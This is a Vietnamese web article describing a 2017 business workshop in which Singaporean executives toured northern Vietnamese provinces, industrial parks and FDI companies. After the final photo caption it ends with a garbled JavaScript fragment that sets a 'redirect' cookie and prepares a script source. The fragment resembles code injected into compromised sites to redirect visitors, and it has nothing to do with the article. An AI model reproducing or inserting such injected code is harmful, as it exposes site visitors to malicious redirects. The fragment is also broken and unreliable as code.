OVERSEAS MARKET WORKSHOP ON VIETNAM 2017

Với mục tiêu hỗ trợ các nhà quản lý và chủ doanh nghiệp Singapore sang tìm hiểu môi trường kinh doanh và khám phá cơ hội đầu tư tại Việt Nam, từ ngày 16/7/2017 – 20/7/2017, HSB đã cùng phối hợp với Singapore Business Fedaration (SBF) – hiệp hội doanh nghiệp Singapore tổ chức thành công chương trình “Overseas Market Workshop on Vietnam 2017”.
Chương trình đã thu hút 22 nhà quản lý, CEOs và chủ doanh nghiệp đại diện cho 14 công ty từ đảo quốc Sư tử tới tham dự. Trong đó có nhiều nhà đầu tư đã có những dự án đầu tư thành công ở Việt Nam nhưng muốn mở rộng quy mô ra phía bắc và tập trung vào ngành công nghiệp sản xuất – lĩnh vực đang còn bỏ ngỏ và còn rất nhiều tiềm năng phát triển.
Thiết kế chương trình vô cùng đặc biệt năm nay giúp cho các nhà đầu tư được tiếp cận các hiểu biết về môi trường đầu tư tại Việt Nam từ góc nhìn vĩ mô của các nhà quản lý nhà nước, các chuyên gia đầu ngành cho tới thực tế làm việc của các khu công nghiệp, các doanh nghiệp FDIs đầu tư thành công tại Việt Nam.

IMG 0546

Diễn giả Đoàn Duy Khương – Phó chủ tịch Phòng thương mại và công nghiệp Việt Nam VCCI

Sau khi trao đổi làm việc với các chuyên gia về đầu tư nước ngoài như Tiến Sĩ Đoàn Duy Khương – Phó chủ tịch VCCI; Tiến sĩ Phan Thùy Trâm – Cựu phó giám đốc IPCN; Ông Phạm Bạch Dương – Cố vấn cao cấp Duane Morris Vietnam LLC; Ông Tô Hải Anh – Phó Ban khách hàng FDI Vietcombank… tại Hà Nội, các nhà đầu tư di chuyển tới các thành phố lớn và làm việc với ban lãnh đạo các tỉnh thành phía bắc đang phát triển các khu công nghiệp và có chính sách khuyến khích FDI như Hải Phòng, Vĩnh Phúc, Bắc Ninh…

IMG 0286

Đoàn làm việc cùng Ông Lê Duy Thành – Phó Chủ Tịch ủy ban nhân dân tỉnh Vĩnh Phúc

Để cung cấp cho các nhà đầu tư góc nhìn thực tiễn và học hỏi kinh nghiệm trực tiếp từ các nhà đầu tư FDI đi trước thành công, chương trình đã thiết kế các buổi tham quan thực địa tại khu công nghiệp VSIP – Bắc Ninh, Khu công nghiệp Deep C – Hải Phòng, công ty Cannon Quế Võ, Sơn Nippon Pain – Vĩnh Phúc….

IMG 0159

Đoàn làm việc cùng Ông Victor Lim
Phó tổng giám đốc khu công nghiệp Việt Nam – Singapore VSIP Bắc Ninh

IMG 0392

Tới thăm công ty TNHH Nippon Paint Vĩnh Phúc

Bên cạnh các chương trình làm việc chính thức, các nhà đầu tư vô cùng hào hứng tham gia bữa tiệc kết nối – Networking dinner với sự tham gia của các nhà quản lý, chủ doanh nghiệp lớn tại Việt Nam. Đây chính là cơ hội cho các doanh nhân trong và ngoài nước kết nối, trao đổi kinh nghiệm và mở rộng networking cũng như tầm nhìn hội nhập quốc tế.

Picture 266

Networking Party trao đổi kinh nghiệm, kết nối với các lãnh đạo doanh nghiệp Việt Nam

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}